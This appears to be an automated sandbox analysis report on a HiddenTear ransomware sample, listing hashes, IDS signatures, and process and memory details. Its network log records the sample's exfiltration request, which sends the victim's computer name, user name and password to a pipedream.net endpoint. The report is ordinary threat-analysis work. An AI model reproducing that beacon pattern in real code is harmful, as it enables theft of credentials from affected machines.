Overview

overview

10

Static

static

10

fd945e2cc6...le.exe

windows7_x64

10

fd945e2cc6...le.exe

windows10_x64

10

Resubmissions

03/08/2021, 07:41 UTC

210803-qwfhgtkjv6 10

26/07/2021, 12:41 UTC

210726-dxe6lafqxn 10

Analysis

  • max time kernel
    19s
  • max time network
    119s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03/08/2021, 07:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe

  • Size

    207KB

  • MD5

    900c456cbcd61ed2bf91378112e93eb0

  • SHA1

    c227ca088a4f80729b83396cafa0152d9778254e

  • SHA256

    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd

  • SHA512

    e9e71efbe7e70ece0d5022c401d6cb8c808237946b6a30fcfe18d8d43ea93460c04977015daf05a7baa5a9f1467c5ffdcf499a52706c27a0055529a3f38f0ba7

Score
10/10
hiddentearransomwaresuricata

Malware Config

Signatures

  • HiddenTear Ransomware

    Open-Source ransomware available on Github since 2015, with many versions in the wild.

    ransomwarehiddentear
  • suricata: ET MALWARE Observed Reimageplus Ransomware Domain in TLS SNI
    suricata
  • suricata: ET MALWARE Reimageplus Ransomware Checkin
    suricata
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:632

Network

  • flag-unknown
    DNS
    enfiniql2buev6o.m.pipedream.net
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    Remote address:
    8.8.8.8:53
    Request
    enfiniql2buev6o.m.pipedream.net
    IN A
    Response
    enfiniql2buev6o.m.pipedream.net
    IN A
    23.20.98.249
    enfiniql2buev6o.m.pipedream.net
    IN A
    54.164.210.73
    enfiniql2buev6o.m.pipedream.net
    IN A
    34.195.72.180
    enfiniql2buev6o.m.pipedream.net
    IN A
    54.237.1.211
    enfiniql2buev6o.m.pipedream.net
    IN A
    44.196.248.120
    enfiniql2buev6o.m.pipedream.net
    IN A
    54.156.232.99
  • flag-unknown
    GET
    https://enfiniql2buev6o.m.pipedream.net/?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    Remote address:
    23.20.98.249:443
    Request
    GET /?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom HTTP/1.1
    Host: enfiniql2buev6o.m.pipedream.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 03 Aug 2021 07:42:15 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 179
    Connection: keep-alive
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    x-pd-status: sent to coordinator
    ETag: W/"b3-17a3f04b518"
  • 23.20.98.249:443
    https://enfiniql2buev6o.m.pipedream.net/?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom
    tls, http
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    901 B
     6.1kB
     9
    8

    HTTP Request

    GET https://enfiniql2buev6o.m.pipedream.net/?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom

    HTTP Response

    200
  • 8.8.8.8:53
    enfiniql2buev6o.m.pipedream.net
    dns
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    77 B
     173 B
     1
    1

    DNS Request

    enfiniql2buev6o.m.pipedream.net

    DNS Response

    23.20.98.249
    54.164.210.73
    34.195.72.180
    54.237.1.211
    44.196.248.120
    54.156.232.99

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/632-114-0x0000000000920000-0x0000000000921000-memory.dmp

    Filesize

    4KB

    Download

  • memory/632-116-0x00000000056B0000-0x00000000056B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/632-117-0x0000000005250000-0x0000000005251000-memory.dmp

    Filesize

    4KB

    Download

  • memory/632-118-0x00000000051B0000-0x00000000056AE000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/632-119-0x0000000005170000-0x0000000005171000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.